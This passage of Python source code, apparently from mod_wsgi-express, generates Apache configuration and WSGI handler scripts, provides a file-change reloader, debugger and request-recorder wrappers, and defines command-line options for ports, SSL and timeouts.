options['setenv_variables']: print(APACHE_SETENV_CONFIG % dict(name=name, value=value), file=fp) if options['passenv_variables']: for name in options['passenv_variables']: print(APACHE_PASSENV_CONFIG % dict(name=name), file=fp) if options['handler_scripts']: print(APACHE_HANDLER_SCRIPT_CONFIG % options, file=fp) for extension, script in options['handler_scripts']: print(APACHE_HANDLER_CONFIG % dict(handler='wsgi-resource', extension=extension), file=fp) if options['with_cgi']: print(APACHE_HANDLER_CONFIG % dict(handler='cgi-script', extension='.cgi'), file=fp) if options['service_scripts']: service_log_files = {} if options['service_log_files']: service_log_files.update(options['service_log_files']) users = dict(options['service_users'] or []) groups = dict(options['service_groups'] or []) for name, script in options['service_scripts']: user = users.get(name, '${MOD_WSGI_USER}') group = groups.get(name, '${MOD_WSGI_GROUP}') if name in service_log_files: print(APACHE_SERVICE_WITH_LOG_CONFIG % dict(name=name, user=user, group=group, script=script, port=options['port'], log_directory=options['log_directory'], log_file=service_log_files[name], rotatelogs_executable=options['rotatelogs_executable'], max_log_size=options['max_log_size'], python_path=options['python_path'], working_directory=options['working_directory'], python_eggs=options['python_eggs'], lang=options['lang'], locale=options['locale'], server_metrics_flag=options['server_metrics_flag']), file=fp) else: print(APACHE_SERVICE_CONFIG % dict(name=name, user=user, group=group, script=script, python_path=options['python_path'], working_directory=options['working_directory'], python_eggs=options['python_eggs'], lang=options['lang'], locale=options['locale'], server_metrics_flag=options['server_metrics_flag']), file=fp) if options['include_files']: for filename in options['include_files']: filename = posixpath.abspath(filename) print(APACHE_INCLUDE_CONFIG % dict(filename=filename), file=fp) if options['with_newrelic_platform']: print(APACHE_TOOLS_CONFIG % options, file=fp) if options['with_newrelic_platform']: print(APACHE_METRICS_CONFIG % options, file=fp) _interval = 1.0 _times = {} _files = [] _running = False _queue = queue.Queue() _lock = threading.Lock() def _restart(path): _queue.put(True) prefix = 'monitor (pid=%d):' % os.getpid() print('%s Change detected to "%s".' % (prefix, path), file=sys.stderr) print('%s Triggering process restart.' % prefix, file=sys.stderr) os.kill(os.getpid(), signal.SIGINT) def _modified(path): try: # If path doesn't denote a file and were previously # tracking it, then it has been removed or the file type # has changed so force a restart. If not previously # tracking the file then we can ignore it as probably # pseudo reference such as when file extracted from a # collection of modules contained in a zip file. if not os.path.isfile(path): return path in _times # Check for when file last modified. mtime = os.stat(path).st_mtime if path not in _times: _times[path] = mtime # Force restart when modification time has changed, even # if time now older, as that could indicate older file # has been restored. if mtime != _times[path]: return True except Exception: # If any exception occured, likely that file has been # been removed just before stat(), so force a restart. return True return False def _monitor(): global _files while True: # Check modification times on all files in sys.modules. 
for module in list(sys.modules.values()): if not hasattr(module, '__file__'): continue path = getattr(module, '__file__') if not path: continue if os.path.splitext(path)[1] in ['.pyc', '.pyo', '.pyd']: path = path[:-1] if _modified(path): return _restart(path) # Check modification times on files which have # specifically been registered for monitoring. for path in _files: if _modified(path): return _restart(path) # Go to sleep for specified interval. try: return _queue.get(timeout=_interval) except queue.Empty: pass _thread = threading.Thread(target=_monitor) _thread.setDaemon(True) def _exiting(): try: _queue.put(True) except Exception: pass _thread.join() def track_changes(path): if not path in _files: _files.append(path) def start_reloader(interval=1.0): global _interval if interval < _interval: _interval = interval global _running _lock.acquire() if not _running: prefix = 'monitor (pid=%d):' % os.getpid() print('%s Starting change monitor.' % prefix, file=sys.stderr) _running = True _thread.start() atexit.register(_exiting) _lock.release() class PostMortemDebugger(object): def __init__(self, application, startup): self.application = application self.generator = None import pdb self.debugger = pdb.Pdb() if startup: self.activate_console() def activate_console(self): self.debugger.set_trace(sys._getframe().f_back) def run_post_mortem(self): self.debugger.reset() self.debugger.interaction(None, sys.exc_info()[2]) def __call__(self, environ, start_response): try: self.generator = self.application(environ, start_response) return self except Exception: self.run_post_mortem() raise def __iter__(self): try: for item in self.generator: yield item except Exception: self.run_post_mortem() raise def close(self): try: if hasattr(self.generator, 'close'): return self.generator.close() except Exception: self.run_post_mortem() raise class RequestRecorder(object): def __init__(self, application, savedir): self.application = application self.savedir = savedir self.lock = threading.Lock() self.pid = os.getpid() self.count = 0 def __call__(self, environ, start_response): with self.lock: self.count += 1 count = self.count key = "%s-%s-%s" % (int(time.time()*1000000), self.pid, count) iheaders = os.path.join(self.savedir, key + ".iheaders") iheaders_fp = open(iheaders, 'w') icontent = os.path.join(self.savedir, key + ".icontent") icontent_fp = open(icontent, 'w+b') oheaders = os.path.join(self.savedir, key + ".oheaders") oheaders_fp = open(oheaders, 'w') ocontent = os.path.join(self.savedir, key + ".ocontent") ocontent_fp = open(ocontent, 'w+b') oaexcept = os.path.join(self.savedir, key + ".oaexcept") oaexcept_fp = open(oaexcept, 'w') orexcept = os.path.join(self.savedir, key + ".orexcept") orexcept_fp = open(orexcept, 'w') ofexcept = os.path.join(self.savedir, key + ".ofexcept") ofexcept_fp = open(ofexcept, 'w') errors = environ['wsgi.errors'] pprint.pprint(environ, stream=iheaders_fp) iheaders_fp.close() input = environ['wsgi.input'] data = input.read(8192) while data: icontent_fp.write(data) data = input.read(8192) icontent_fp.flush() icontent_fp.seek(0, os.SEEK_SET) environ['wsgi.input'] = icontent_fp def _start_response(status, response_headers, *args): pprint.pprint(((status, response_headers)+args), stream=oheaders_fp) _write = start_response(status, response_headers, *args) def write(self, data): ocontent_fp.write(data) ocontent_fp.flush() return _write(data) return write try: try: result = self.application(environ, _start_response) except: traceback.print_exception(*sys.exc_info(), 
file=oaexcept_fp) raise try: for data in result: ocontent_fp.write(data) ocontent_fp.flush() yield data except: traceback.print_exception(*sys.exc_info(), file=orexcept_fp) raise finally: try: if hasattr(result, 'close'): result.close() except: traceback.print_exception(*sys.exc_info(), file=ofexcept_fp) raise finally: oheaders_fp.close() ocontent_fp.close() oaexcept_fp.close() orexcept_fp.close() ofexcept_fp.close() class ApplicationHandler(object): def __init__(self, entry_point, application_type='script', callable_object='application', mount_point='/', with_newrelic_agent=False, debug_mode=False, enable_debugger=False, debugger_startup=False, enable_recorder=False, recorder_directory=None): self.entry_point = entry_point self.application_type = application_type self.callable_object = callable_object self.mount_point = mount_point if application_type == 'module': __import__(entry_point) self.module = sys.modules[entry_point] self.application = getattr(self.module, callable_object) self.target = self.module.__file__ parts = os.path.splitext(self.target)[-1] if parts[-1].lower() in ('.pyc', '.pyd', '.pyd'): self.target = parts[0] + '.py' elif application_type == 'paste': from paste.deploy import loadapp self.application = loadapp('config:%s' % entry_point) self.target = entry_point elif application_type != 'static': self.module = types.ModuleType('__wsgi__') self.module.__file__ = entry_point with open(entry_point, 'r') as fp: code = compile(fp.read(), entry_point, 'exec', dont_inherit=True) exec(code, self.module.__dict__) sys.modules['__wsgi__'] = self.module self.application = getattr(self.module, callable_object) self.target = entry_point try: self.mtime = os.path.getmtime(self.target) except Exception: self.mtime = None if with_newrelic_agent: self.setup_newrelic_agent() self.debug_mode = debug_mode self.enable_debugger = enable_debugger if enable_debugger: self.setup_debugger(debugger_startup) if enable_recorder: self.setup_recorder(recorder_directory) def setup_newrelic_agent(self): import newrelic.agent config_file = os.environ.get('NEW_RELIC_CONFIG_FILE') environment = os.environ.get('NEW_RELIC_ENVIRONMENT') global_settings = newrelic.agent.global_settings() if global_settings.log_file is None: global_settings.log_file = 'stderr' newrelic.agent.initialize(config_file, environment) newrelic.agent.register_application() self.application = newrelic.agent.WSGIApplicationWrapper( self.application) def setup_debugger(self, startup): self.application = PostMortemDebugger(self.application, startup) def setup_recorder(self, savedir): self.application = RequestRecorder(self.application, savedir) def reload_required(self, environ): if self.debug_mode: return False try: mtime = os.path.getmtime(self.target) except Exception: mtime = None return mtime != self.mtime def handle_request(self, environ, start_response): # Strip out the leading component due to internal redirect in # Apache when using web application as fallback resource. mount_point = environ.get('mod_wsgi.mount_point') script_name = environ.get('SCRIPT_NAME') path_info = environ.get('PATH_INFO') if mount_point is not None: # If this is set then it means that SCRIPT_NAME was # overridden by a trusted proxy header. In this case # we want to ignore any local mount point, simply # stripping it from the path. 
script_name = environ['mod_wsgi.script_name'] environ['PATH_INFO'] = script_name + path_info if self.mount_point != '/': if environ['PATH_INFO'].startswith(self.mount_point): environ['PATH_INFO'] = environ['PATH_INFO'][len( self.mount_point):] else: environ['SCRIPT_NAME'] = '' environ['PATH_INFO'] = script_name + path_info if self.mount_point != '/': if environ['PATH_INFO'].startswith(self.mount_point): environ['SCRIPT_NAME'] = self.mount_point environ['PATH_INFO'] = environ['PATH_INFO'][len( self.mount_point):] return self.application(environ, start_response) def __call__(self, environ, start_response): return self.handle_request(environ, start_response) class ResourceHandler(object): def __init__(self, resources): self.resources = {} for extension, script in resources: extension_name = re.sub(r'[^\w]{1}', '_', extension) module_name = '__wsgi_resource%s__' % extension_name module = types.ModuleType(module_name) module.__file__ = script with open(script, 'r') as fp: code = compile(fp.read(), script, 'exec', dont_inherit=True) exec(code, module.__dict__) sys.modules[module_name] = module self.resources[extension] = module def resource_extension(self, resource): return os.path.splitext(resource)[-1] def reload_required(self, resource): extension = self.resource_extension(resource) function = getattr(self.resources[extension], 'reload_required', None) if function is not None: return function(environ) return False def handle_request(self, environ, start_response): resource = environ['SCRIPT_NAME'] extension = self.resource_extension(resource) module = self.resources[extension] function = getattr(module, 'handle_request', None) if function is not None: return function(environ, start_response) function = getattr(module, 'application') return function(environ, start_response) def __call__(self, environ, start_response): return self.handle_request(environ, start_response) WSGI_HANDLER_SCRIPT = """ import os import sys import atexit import time import mod_wsgi.server working_directory = r'%(working_directory)s' entry_point = r'%(entry_point)s' application_type = '%(application_type)s' callable_object = '%(callable_object)s' mount_point = '%(mount_point)s' with_newrelic_agent = %(with_newrelic_agent)s newrelic_config_file = '%(newrelic_config_file)s' newrelic_environment = '%(newrelic_environment)s' disable_reloading = %(disable_reloading)s reload_on_changes = %(reload_on_changes)s debug_mode = %(debug_mode)s enable_debugger = %(enable_debugger)s debugger_startup = %(debugger_startup)s enable_coverage = %(enable_coverage)s coverage_directory = '%(coverage_directory)s' enable_profiler = %(enable_profiler)s profiler_directory = '%(profiler_directory)s' enable_recorder = %(enable_recorder)s recorder_directory = '%(recorder_directory)s' enable_gdb = %(enable_gdb)s os.environ['MOD_WSGI_EXPRESS'] = 'true' os.environ['MOD_WSGI_SERVER_NAME'] = '%(server_host)s' os.environ['MOD_WSGI_SERVER_ALIASES'] = %(server_aliases)r or '' if reload_on_changes: os.environ['MOD_WSGI_RELOADER_ENABLED'] = 'true' if debug_mode: os.environ['MOD_WSGI_DEBUG_MODE'] = 'true' # We need to fiddle sys.path as we are not using daemon mode and so # the working directory will not be added to sys.path by virtue of # 'home' option to WSGIDaemonProcess directive. We could use the # WSGIPythonPath directive, but that will cause .pth files to also # be evaluated. 
sys.path.insert(0, working_directory) if enable_debugger: os.environ['MOD_WSGI_DEBUGGER_ENABLED'] = 'true' def output_coverage_report(): coverage_info.stop() coverage_info.html_report(directory=coverage_directory) if enable_coverage: os.environ['MOD_WSGI_COVERAGE_ENABLED'] = 'true' from coverage import coverage coverage_info = coverage() coverage_info.start() atexit.register(output_coverage_report) def output_profiler_data(): profiler_info.disable() output_file = '%%s-%%d.pstats' %% (int(time.time()*1000000), os.getpid()) output_file = os.path.join(profiler_directory, output_file) profiler_info.dump_stats(output_file) if enable_profiler: os.environ['MOD_WSGI_PROFILER_ENABLED'] = 'true' from cProfile import Profile profiler_info = Profile() profiler_info.enable() atexit.register(output_profiler_data) if enable_recorder: os.environ['MOD_WSGI_RECORDER_ENABLED'] = 'true' if enable_gdb: os.environ['MOD_WSGI_GDB_ENABLED'] = 'true' if with_newrelic_agent: if newrelic_config_file: os.environ['NEW_RELIC_CONFIG_FILE'] = newrelic_config_file if newrelic_environment: os.environ['NEW_RELIC_ENVIRONMENT'] = newrelic_environment handler = mod_wsgi.server.ApplicationHandler(entry_point, application_type=application_type, callable_object=callable_object, mount_point=mount_point, with_newrelic_agent=with_newrelic_agent, debug_mode=debug_mode, enable_debugger=enable_debugger, debugger_startup=debugger_startup, enable_recorder=enable_recorder, recorder_directory=recorder_directory) if not disable_reloading: reload_required = handler.reload_required handle_request = handler.handle_request if not disable_reloading and reload_on_changes and not debug_mode: mod_wsgi.server.start_reloader() """ WSGI_RESOURCE_SCRIPT = """ import mod_wsgi.server resources = %(resources)s handler = mod_wsgi.server.ResourceHandler(resources) reload_required = handler.reload_required handle_request = handler.handle_request """ WSGI_DEFAULT_SCRIPT = """ CONTENT = b''' <html> <head> <title>My web site runs on Malt Whiskey</title> </head> <body style="margin-top: 100px;"> <table align="center"; style="width: 850px;" border="0" cellpadding="30"> <tbody> <tr> <td> <img style="width: 275px; height: 445px;" src="/__wsgi__/images/snake-whiskey.jpg"> </td> <td style="text-align: center;"> <span style="font-family: Arial,Helvetica,sans-serif; font-weight: bold; font-size: 70px;"> My web site<br>runs on<br>Malt Whiskey<br> <br> </span> <span style="font-family: Arial,Helvetica,sans-serif; font-weight: bold;"> For further information on configuring mod_wsgi,<br> see the <a href="%(documentation_url)s">documentation</a>. 
</span> </td> </tr> </tbody> </table> </body> </html> ''' def application(environ, start_response): status = '200 OK' output = CONTENT response_headers = [('Content-type', 'text/html'), ('Content-Length', str(len(output)))] start_response(status, response_headers) return [output] """ def generate_wsgi_handler_script(options): path = os.path.join(options['server_root'], 'handler.wsgi') with open(path, 'w') as fp: print(WSGI_HANDLER_SCRIPT % options, file=fp) path = os.path.join(options['server_root'], 'resource.wsgi') with open(path, 'w') as fp: print(WSGI_RESOURCE_SCRIPT % dict(resources=repr( options['handler_scripts'])), file=fp) path = os.path.join(options['server_root'], 'default.wsgi') with open(path, 'w') as fp: print(WSGI_DEFAULT_SCRIPT % options, file=fp) SERVER_METRICS_SCRIPT = """ import os import logging newrelic_config_file = '%(newrelic_config_file)s' newrelic_environment = '%(newrelic_environment)s' with_newrelic_platform = %(with_newrelic_platform)s if with_newrelic_platform: if newrelic_config_file: os.environ['NEW_RELIC_CONFIG_FILE'] = newrelic_config_file if newrelic_environment: os.environ['NEW_RELIC_ENVIRONMENT'] = newrelic_environment logging.basicConfig(level=logging.INFO, format='%%(name)s (pid=%%(process)d, level=%%(levelname)s): %%(message)s') _logger = logging.getLogger(__name__) try: from mod_wsgi.metrics.newrelic import Agent agent = Agent() agent.start() except ImportError: _logger.fatal('The module mod_wsgi.metrics.newrelic is not available. ' 'The New Relic platform plugin has been disabled. Install the ' '"mod_wsgi-metrics" package.') """ def generate_server_metrics_script(options): path = os.path.join(options['server_root'], 'server-metrics.py') with open(path, 'w') as fp: print(SERVER_METRICS_SCRIPT % options, file=fp) WSGI_CONTROL_SCRIPT = """ #!%(shell_executable)s # %(sys_argv)s HTTPD="%(httpd_executable)s" HTTPD_ARGS="%(httpd_arguments)s" HTTPD_COMMAND="$HTTPD $HTTPD_ARGS" MOD_WSGI_MODULES_DIRECTORY="%(modules_directory)s" export MOD_WSGI_MODULES_DIRECTORY SHLIBPATH="%(shlibpath)s" if [ "x$SHLIBPATH" != "x" ]; then %(shlibpath_var)s="$SHLIBPATH:$%(shlibpath_var)s" export %(shlibpath_var)s fi MOD_WSGI_SERVER_ROOT="%(server_root)s" export MOD_WSGI_SERVER_ROOT MOD_WSGI_LISTENER_HOST="%(host)s" export MOD_WSGI_LISTENER_HOST MOD_WSGI_HTTP_PORT="%(port)s" MOD_WSGI_HTTPS_PORT="%(https_port)s" export MOD_WSGI_HTTP_PORT export MOD_WSGI_HTTPS_PORT WSGI_RUN_USER="${WSGI_RUN_USER:-%(user)s}" WSGI_RUN_GROUP="${WSGI_RUN_GROUP:-%(group)s}" MOD_WSGI_USER="${MOD_WSGI_USER:-${WSGI_RUN_USER}}" MOD_WSGI_GROUP="${MOD_WSGI_GROUP:-${WSGI_RUN_GROUP}}" export MOD_WSGI_USER export MOD_WSGI_GROUP if [ `id -u` = "0" -a ${MOD_WSGI_USER} = "root" ]; then cat << EOF WARNING: When running as the 'root' user, it is required that the options '--user' and '--group' be specified to mod_wsgi-express. These should define a non 'root' user and group under which the Apache child worker processes and mod_wsgi daemon processes should be run. Failure to specify these options will result in Apache and/or the mod_wsgi daemon processes failing to start. See the mod_wsgi-express documentation for further information on this restriction. EOF fi MOD_WSGI_WORKING_DIRECTORY="%(working_directory)s" export MOD_WSGI_WORKING_DIRECTORY LANG='%(lang)s' LC_ALL='%(locale)s' export LANG export LC_ALL ACMD="$1" ARGV="$@" if test -f %(server_root)s/envvars; then . 
%(server_root)s/envvars fi STATUSURL="http://%(host)s:%(port)s/server-status" if [ "x$ARGV" = "x" ]; then ARGV="-h" fi GDB="%(gdb_executable)s" ENABLE_GDB="%(enable_gdb)s" PROCESS_NAME="%(process_name)s" cd $MOD_WSGI_WORKING_DIRECTORY case $ACMD in start|stop|restart|graceful|graceful-stop) if [ "x$ENABLE_GDB" != "xTrue" ]; then exec -a "$PROCESS_NAME" $HTTPD_COMMAND -k $ARGV else echo "run $HTTPD_ARGS -k $ARGV" > %(server_root)s/gdb.cmds gdb -x %(server_root)s/gdb.cmds $HTTPD fi ;; configtest) exec $HTTPD_COMMAND -t ;; status) exec %(python_executable)s -m webbrowser -t $STATUSURL ;; *) exec $HTTPD_COMMAND $ARGV esac """ APACHE_ENVVARS_FILE = """ . %(envvars_script)s """ def generate_control_scripts(options): path = os.path.join(options['server_root'], 'apachectl') with open(path, 'w') as fp: print(WSGI_CONTROL_SCRIPT.lstrip() % options, file=fp) os.chmod(path, 0o755) path = os.path.join(options['server_root'], 'envvars') if options['envvars_script']: with open(path, 'w') as fp: if options['envvars_script']: print(APACHE_ENVVARS_FILE.lstrip() % options, file=fp) elif not os.path.isfile(path): with open(path, 'w') as fp: pass def check_percentage(option, opt_str, value, parser): if value is not None and value < 0 or value > 1: raise optparse.OptionValueError('%s option value needs to be within ' 'the range 0 to 1.' % opt_str) setattr(parser.values, option.dest, value) option_list = [] def add_option(platforms, *args, **kwargs): targets = platforms.split('|') suppress = False if os.name == 'nt': if 'all' not in targets and 'windows' not in targets: suppress = True else: if 'all' not in targets and 'unix' not in targets: suppress = True if suppress: kwargs['help'] = optparse.SUPPRESS_HELP if 'hidden' in targets: kwargs['help'] = optparse.SUPPRESS_HELP option_list.append(optparse.make_option(*args, **kwargs)) add_option('all', '--application-type', default='script', metavar='TYPE', help='The type of WSGI application entry point ' 'that was provided. Defaults to \'script\', indicating the ' 'traditional mod_wsgi style WSGI script file specified by a ' 'filesystem path. Alternatively one can supply \'module\', ' 'indicating that the provided entry point is a Python module ' 'which should be imported using the standard Python import ' 'mechanism, or \'paste\' indicating that the provided entry ' 'point is a Paste deployment configuration file. If you want ' 'to just use the server to host static files only, then you ' 'can also instead supply \'static\' with the target being ' 'the directory containing the files to server or the current ' 'directory if none is supplied.') add_option('all', '--entry-point', default=None, metavar='FILE-PATH|MODULE', help='The file system path or ' 'module name identifying the file which contains the WSGI ' 'application entry point. How the value given is interpreted ' 'depends on the corresponding type identified using the ' '\'--application-type\' option. Use of this option is the ' 'same as if the value had been given as argument but without ' 'any option specifier. A named option is also provided so ' 'as to make it clearer in a long option list what the entry ' 'point actually is. If both methods are used, that specified ' 'by this option will take precedence.') add_option('all', '--host', default=None, metavar='IP-ADDRESS', help='The specific host (IP address) interface on which ' 'requests are to be accepted. 
Defaults to listening on ' 'all host interfaces.') add_option('all', '--port', default=8000, type='int', metavar='NUMBER', help='The specific port to bind to and ' 'on which requests are to be accepted. Defaults to port 8000.') add_option('all', '--http2', action='store_true', default=False, help='Flag indicating whether HTTP/2 should be enabled.' 'Requires the mod_http2 module to be available.') add_option('all', '--https-port', type='int', metavar='NUMBER', help='The specific port to bind to and on which secure ' 'requests are to be accepted.') add_option('all', '--ssl-port', type='int', metavar='NUMBER', dest='https_port', help=optparse.SUPPRESS_HELP) add_option('all', '--ssl-certificate-file', default=None, metavar='FILE-PATH', help='Specify the path to the SSL ' 'certificate file.') add_option('all', '--ssl-certificate-key-file', default=None, metavar='FILE-PATH', help='Specify the path to the private ' 'key file corresponding to the SSL certificate file.') add_option('all', '--ssl-certificate', default=None, metavar='FILE-PATH', help='Specify the common path to the SSL ' 'certificate files. This is a convenience function so that ' 'only one option is required to specify the location of the ' 'certificate file and the private key file. It is expected that ' 'the files have \'.crt\' and \'.key\' extensions. This option ' 'should refer to the common part of the names for both files ' 'which appears before the extension.') add_option('all', '--ssl-ca-certificate-file', default=None, metavar='FILE-PATH', help='Specify the path to the file with ' 'the CA certificates to be used for client authentication. When ' 'specified, access to the whole site will by default require ' 'client authentication. To require client authentication for ' 'only parts of the site, use the --ssl-verify-client option.') add_option('all', '--ssl-verify-client', action='append', metavar='URL-PATH', dest='ssl_verify_client_urls', help='Specify a sub URL of the site for which client ' 'authentication is required. When this option is specified, ' 'the default of client authentication being required for the ' 'whole site will be disabled and verification will only be ' 'required for the specified sub URL.') add_option('all', '--ssl-certificate-chain-file', default=None, metavar='FILE-PATH', help='Specify the path to a file ' 'containing the certificates of Certification Authorities (CA) ' 'which form the certificate chain of the server certificate.') add_option('all', '--ssl-environment', action='store_true', default=False, help='Flag indicating whether the standard set ' 'of SSL related variables are passed in the per request ' 'environment passed to a handler.') add_option('all', '--https-only', action='store_true', default=False, help='Flag indicating whether any requests ' 'made using a HTTP request over the non secure connection ' 'should be redirected automatically to use a HTTPS request ' 'over the secure connection.') add_option('all', '--hsts-policy', default=None, metavar='PARAMS', help='Specify the HSTS policy that should be applied when ' 'HTTPS only connections are being enforced.') add_option('all', '--server-name', default=None, metavar='HOSTNAME', help='The primary host name of the web server. If this name ' 'starts with \'www.\' then an automatic redirection from the ' 'parent domain name to the \'www.\' server name will created.') add_option('all', '--server-alias', action='append', dest='server_aliases', metavar='HOSTNAME', help='A secondary ' 'host name for the web server. 
May include wildcard patterns.') add_option('all', '--allow-localhost', action='store_true', default=False, help='Flag indicating whether access via ' 'localhost should still be allowed when a server name has been ' 'specified and a name based virtual host has been configured.') add_option('unix', '--processes', type='int', metavar='NUMBER', help='The number of worker processes (instances of the WSGI ' 'application) to be started up and which will handle requests ' 'concurrently. Defaults to a single process.') add_option('all', '--threads', type='int', default=5, metavar='NUMBER', help='The number of threads in the request thread pool of ' 'each process for handling requests. Defaults to 5 in each ' 'process. Note that if embedded mode and only prefork MPM ' 'is available, then processes will instead be used.') add_option('unix', '--max-clients', type='int', default=None, metavar='NUMBER', help='The maximum number of simultaneous ' 'client connections that will be accepted. This will default ' 'to being 1.5 times the total number of threads in the ' 'request thread pools across all process handling requests. ' 'Note that if embedded mode is used this will be ignored.') add_option('unix', '--initial-workers', type='float', default=None, metavar='NUMBER', action='callback', callback=check_percentage, help='The initial number of workers to create on startup ' 'expressed as a percentage of the maximum number of clients. ' 'The value provided should be between 0 and 1. The default is ' 'dependent on the type of MPM being used. Note that if ' 'embedded mode is used, this will be ignored.'), add_option('unix', '--minimum-spare-workers', type='float', default=None, metavar='NUMBER', action='callback', callback=check_percentage, help='The minimum number of spare ' 'workers to maintain expressed as a percentage of the maximum ' 'number of clients. The value provided should be between 0 and ' '1. The default is dependent on the type of MPM being used. ' 'Note that if embedded mode is used, this will be ignored.') add_option('unix', '--maximum-spare-workers', type='float', default=None, metavar='NUMBER', action='callback', callback=check_percentage, help='The maximum number of spare ' 'workers to maintain expressed as a percentage of the maximum ' 'number of clients. The value provided should be between 0 and ' '1. The default is dependent on the type of MPM being used. ' 'Note that if embedded mode is used, this will be ignored.') add_option('all', '--limit-request-body', type='int', default=10485760, metavar='NUMBER', help='The maximum number of bytes which are ' 'allowed in a request body. Defaults to 10485760 (10MB).') add_option('all', '--maximum-requests', type='int', default=0, metavar='NUMBER', help='The number of requests after which ' 'any one worker process will be restarted and the WSGI ' 'application reloaded. Defaults to 0, indicating that the ' 'worker process should never be restarted based on the number ' 'of requests received.') add_option('unix', '--startup-timeout', type='int', default=15, metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass waiting for the application to be successfully ' 'loaded and started by a worker process. When this timeout ' 'has been reached without the application having been ' 'successfully loaded and started, the worker process will ' 'be forced to restart. 
Defaults to 15 seconds.') add_option('unix', '--shutdown-timeout', type='int', default=5, metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass when waiting for a worker process to shutdown as a ' 'result of the maximum number of requests or inactivity timeout ' 'being reached, or when a user initiated SIGINT signal is sent ' 'to a worker process. When this timeout has been reached the ' 'worker process will be forced to exit even if there are ' 'still active requests or it is still running Python exit ' 'functions. Defaults to 5 seconds.') add_option('unix', '--restart-interval', type='int', default='0', metavar='SECONDS', help='Number of seconds between worker ' 'process restarts. If graceful timeout is also specified, ' 'active requests will be given a chance to complete before ' 'the process is forced to exit and restart. Not enabled by ' 'default.') add_option('unix', '--cpu-time-limit', type='int', default='0', metavar='SECONDS', help='Number of seconds of CPU time the ' 'process can use before it will be restarted. If graceful ' 'timeout is also specified, active requests will be given ' 'a chance to complete before the process is forced to exit ' 'and restart. Not enabled by default.') add_option('unix', '--graceful-timeout', type='int', default=15, metavar='SECONDS', help='Grace period for requests to complete ' 'normally, while still accepting new requests, when worker ' 'processes are being shutdown and restarted due to maximum ' 'requests being reached or restart interval having expired. ' 'Defaults to 15 seconds.') add_option('unix', '--eviction-timeout', type='int', default=0, metavar='SECONDS', help='Grace period for requests to complete ' 'normally, while still accepting new requests, when the WSGI ' 'application is being evicted from the worker processes, and ' 'the process restarted, due to forced graceful restart signal. ' 'Defaults to timeout specified by \'--graceful-timeout\' ' 'option.') add_option('unix', '--deadlock-timeout', type='int', default=60, metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass before the worker process is forcibly shutdown and ' 'restarted after a potential deadlock on the Python GIL has ' 'been detected. Defaults to 60 seconds.') add_option('unix', '--inactivity-timeout', type='int', default=0, metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass before the worker process is shutdown and restarted ' 'when the worker process has entered an idle state and is no ' 'longer receiving new requests. Not enabled by default.') add_option('unix', '--ignore-activity', action='append', dest='ignore_activity', metavar='URL-PATH', help='Specify ' 'the URL path for any location where activity should be ' 'ignored when the \'--activity-timeout\' option is used. ' 'This would be used on health check URLs so that health ' 'checks do not prevent process restarts due to inactivity.') add_option('unix', '--request-timeout', type='int', default=60, metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass before the worker process is forcibly shutdown and ' 'restarted when a request does not complete in the expected ' 'time. In a multi threaded worker, the request time is ' 'calculated as an average across all request threads. 
Defaults ' 'to 60 seconds.') add_option('unix', '--connect-timeout', type='int', default=15, metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass before giving up on attempting to get a connection ' 'to the worker process from the Apache child process which ' 'accepted the request. This comes into play when the worker ' 'listener backlog limit is exceeded. Defaults to 15 seconds.') add_option('all', '--socket-timeout', type='int', default=60, metavar='SECONDS', help='Maximum number of seconds allowed ' 'to pass before timing out on a read or write operation on ' 'a socket and aborting the request. Defaults to 60 seconds.') add_option('all', '--queue-timeout', type='int', default=45, metavar='SECONDS', help='Maximum number of seconds allowed ' 'for a request to be accepted by a worker process to be ' 'handled, taken from the time when the Apache child process ' 'originally accepted the request. Defaults to 45 seconds.') add_option('all', '--header-timeout', type='int', default=15, metavar='SECONDS', help='The number of seconds allowed for ' 'receiving the request including the headers. This may be ' 'dynamically increased if a minimum rate for reading the ' 'request and headers is also specified, up to any limit ' 'imposed by a maximum header timeout. Defaults to 15 seconds.') add_option('all', '--header-max-timeout', type='int', default=30, metavar='SECONDS', help='Maximum number of seconds allowed for ' 'receiving the request including the headers. This is the hard ' 'limit after taking into consideration and increases to the ' 'basic timeout due to minimum rate for reading the request and ' 'headers which may be specified. Defaults to 30 seconds.') add_option('all', '--header-min-rate', type='int', default=500, metavar='BYTES', help='The number of bytes required to be sent ' 'as part of the request and headers to trigger a dynamic ' 'increase in the timeout on receiving the request including ' 'headers. Each time this number of bytes is received the timeout ' 'will be increased by 1 second up to any maximum specified by ' 'the maximum header timeout. Defaults to 500 bytes.') add_option('all', '--body-timeout', type='int', default=15, metavar='SECONDS', help='The number of seconds allowed for ' 'receiving the request body. This may be dynamically increased ' 'if a minimum rate for reading the request body is also ' 'specified, up to any limit imposed by a maximum body timeout. ' 'Defaults to 15 seconds.') add_option('all', '--body-max-timeout', type='int', default=0, metavar='SECONDS', help='Maximum number of seconds allowed for ' 'receiving the request body. This is the hard limit after ' 'taking into consideration and increases to the basic timeout ' 'due to minimum rate for reading the request body which may be ' 'specified. Defaults to 0 indicating there is no maximum.') add_option('all', '--body-min-rate', type='int', default=500, metavar='BYTES', help='The number of bytes required to be sent ' 'as part of the request body to trigger a dynamic increase in ' 'the timeout on receiving the request body. Each time this ' 'number of bytes is received the timeout will be increased ' 'by 1 second up to any maximum specified by the maximum body ' 'timeout. Defaults to 500 bytes.') add_option('all', '--server-backlog', type='int', default=500, metavar='NUMBER', help='Depth of server socket listener ' 'backlog for Apache child processes. 
Defaults to 500.') add_option('unix', '--daemon-backlog', type='int', default=100, metavar='NUMBER', help='Depth of server socket listener ' 'backlog for daemon processes. Defaults to 100.') add_option('unix', '--send-buffer-size', type='int', default=0, metavar='NUMBER', help='Size of socket buffer for sending ' 'data to daemon processes. Defaults to 0, indicating ' 'the system default socket buffer size is used.') add_option('unix', '--receive-buffer-size', type='int', default=0, metavar='NUMBER', help='Size of socket buffer for receiving ' 'data from daemon processes. Defaults to 0, indicating ' 'the system default socket buffer size is used.') add_option('unix', '--header-buffer-size', type='int', default=0, metavar='NUMBER', help='Size of buffer used for reading ' 'response headers from daemon processes. Defaults to 0, ' 'indicating internal default of 32768 bytes is used.') add_option('unix', '--response-buffer-size', type='int', default=0, metavar='NUMBER', help='Maximum amount of response content ' 'that will be allowed to be buffered in the Apache child ' 'worker process when proxying the response from a daemon ' 'process. Defaults to 0, indicating internal default of ' '65536 bytes is used.') add_option('unix', '--response-socket-timeout', type='int', default=0, 